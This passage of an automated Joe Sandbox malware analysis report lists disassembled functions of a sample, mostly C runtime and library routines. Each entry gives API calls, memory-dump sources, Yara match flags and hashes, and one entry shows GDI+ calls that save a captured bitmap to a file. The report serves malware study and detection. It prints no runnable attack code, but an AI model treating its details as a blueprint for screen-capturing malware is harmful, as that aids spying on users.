                                                    Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                    • int.LIBCPMT ref: 00404C3C
                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                    • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                    • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                    • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                    Function 024FC3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 024FC401
                                                    • int.LIBCPMT ref: 024FC418
                                                      • Part of subcall function 024FBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024FBFD4
                                                      • Part of subcall function 024FBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024FBFEE
                                                    • std::locale::_Getfacet.LIBCPMT ref: 024FC421
                                                    • std::_Facet_Register.LIBCPMT ref: 024FC452
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 024FC468
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024FC486
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                    • Instruction ID: e6bf110944c53515d6fe22bfebda49fcc80054e3aef92ca47cb9525f088b6c3a
                                                    • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                    • Instruction Fuzzy Hash: 4C11CE72D00229ABCB55EBA4C884AEE7772AFC4754F14051BE611BB2E0DF748A01CFA4
                                                    Function 024F4E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 024F4E8C
                                                    • int.LIBCPMT ref: 024F4EA3
                                                      • Part of subcall function 024FBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024FBFD4
                                                      • Part of subcall function 024FBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024FBFEE
                                                    • std::locale::_Getfacet.LIBCPMT ref: 024F4EAC
                                                    • std::_Facet_Register.LIBCPMT ref: 024F4EDD
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 024F4EF3
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024F4F11
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                    • Instruction ID: 430b6f76fc2b0604ab3ad552e6ba946144cb142f7b15e970cc83c8c071858a33
                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                    • Instruction Fuzzy Hash: 7211CE329002299BCB55EBA4D844AEF7772BFC4324F14051AE611BB2E0EF749A01CFA4
                                                    Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                    • __Getcoll.LIBCPMT ref: 00404EC4
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                    • String ID: fJ@
                                                    • API String ID: 1836011271-3478227103
                                                    • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                    • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                    • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                    • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                    Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                    • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                    • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                    • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                    Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                    • String ID: pScheduler
                                                    • API String ID: 3657713681-923244539
                                                    • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                    • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                    • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                    • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                    Function 025308F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog3_catchmake_shared
                                                    • String ID: MOC$RCC$v)D
                                                    • API String ID: 3472968176-3108830043
                                                    • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                    • Instruction ID: cf8df1994c6602344a145848d6d9f0ee244643d2b639149acdc7a34707f57e8a
                                                    • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                    • Instruction Fuzzy Hash: 0CF06272A00619DFEB17FF64C41066C3B65BF95B14F469491F440AF2E0CB789948CFA9
                                                    Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                    • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                    • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                    • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                    Function 0251B36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                    • Instruction ID: df6e2adaeb7e325d0fa7fa884241381e89b564d2df709859ae8b88b85cad1551
                                                    • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                    • Instruction Fuzzy Hash: 7671D6759002169BEF21CF59C884ABFBF7AFF4532CF56462AE41197180EB708D41CBA9
                                                    Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                    • _free.LIBCMT ref: 00430B4F
                                                    • _free.LIBCMT ref: 00430B66
                                                    • _free.LIBCMT ref: 00430B85
                                                    • _free.LIBCMT ref: 00430BA0
                                                    • _free.LIBCMT ref: 00430BB7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 3033488037-0
                                                    • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                    • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                    • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                    • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                    Function 02520CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 3033488037-0
                                                    • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                    • Instruction ID: 7a4421f16dd7e1cd1bcb72926791fdd6410ab0b731024d328146ccbc78b88c48
                                                    • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                    • Instruction Fuzzy Hash: D251D431A02325AFDB20DF29C881B6A7BF5FF5A724F140569E809D72D0E735E905CB88
                                                    Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                    • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                    • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                    Function 02521742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                    • Instruction ID: 14c7d0057ae7f0c0b83c3a0d4a910a83d2130f7c96a52ce565a8ea3bdb05ca27
                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                    • Instruction Fuzzy Hash: 7A41D236A006149BCB14DF78C880B5EB7F6FF8A724B1585A9D905EB3C1D731E905CB88
                                                    Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                    • __alloca_probe_16.LIBCMT ref: 00436922
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                    • __freea.LIBCMT ref: 0043698E
                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                    • String ID:
                                                    • API String ID: 313313983-0
                                                    • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                    • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                    • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                    • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                    Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                      • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                    • List.LIBCMT ref: 0041AFB4
                                                    • List.LIBCMT ref: 0041AFC3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                    • String ID:
                                                    • API String ID: 3281396844-0
                                                    • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                    • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                    • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                    • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                    Function 0250B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _SpinWait.LIBCONCRT ref: 0250B152
                                                      • Part of subcall function 02501188: _SpinWait.LIBCONCRT ref: 025011A0
                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0250B166
                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0250B198
                                                    • List.LIBCMT ref: 0250B21B
                                                    • List.LIBCMT ref: 0250B22A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                    • String ID:
                                                    • API String ID: 3281396844-0
                                                    • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                    • Instruction ID: dfb8b37a76b3d584712507f325da13e6f5c43dba04311e639f0daa0eba10b22e
                                                    • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                    • Instruction Fuzzy Hash: 00314232D00616DFCB14EFA4C9D0AEDBBB2BF84308F04406AC81167681CB31AE04CB99
                                                    Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                    • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                    • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                    • String ID:
                                                    • API String ID: 2357751836-0
                                                    • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                    • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                    • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                    • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                    Function 024F50C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024F50A3
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024F50B7
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024F511C
                                                    • __Getcoll.LIBCPMT ref: 024F512B
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024F513B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                    • String ID:
                                                    • API String ID: 2395760641-0
                                                    • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                    • Instruction ID: 259cdba1d6b8fa14955a818e7bd4317cc8e01e0c58c1915354542a141ce974bf
                                                    • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                    • Instruction Fuzzy Hash: 78219A72814208AFDB81EFA4C484BDDB7B1FF90715F51800FE585AB281DB749544CF95
                                                    Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                    • _free.LIBCMT ref: 00431F98
                                                    • _free.LIBCMT ref: 00431FBF
                                                    • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                    • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                    • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                    • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                    • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                    Function 025221C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(024FDAD7,024FDAD7,00000002,0251ED35,02523951,00000000,?,02516A05,00000002,00000000,00000000,00000000,?,024FCF88,024FDAD7,00000004), ref: 025221CA
                                                    • _free.LIBCMT ref: 025221FF
                                                    • _free.LIBCMT ref: 02522226
                                                    • SetLastError.KERNEL32(00000000,?,024FDAD7), ref: 02522233
                                                    • SetLastError.KERNEL32(00000000,?,024FDAD7), ref: 0252223C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                    • Instruction ID: 019d0014d482bb3738b31e91d2ded5d9896a2bb6d22d45247859cf38d1adab07
                                                    • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                    • Instruction Fuzzy Hash: 9001D63A2457313B93166B349C44E2B2A1EBBD3772F200524FC15D22D1EFA5C90D852D
                                                    Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                    • _free.LIBCMT ref: 00431F11
                                                    • _free.LIBCMT ref: 00431F39
                                                    • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                    • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                    • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                    • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                    • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                    Function 02522141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                    • _free.LIBCMT ref: 02522178
                                                    • _free.LIBCMT ref: 025221A0
                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221AD
                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
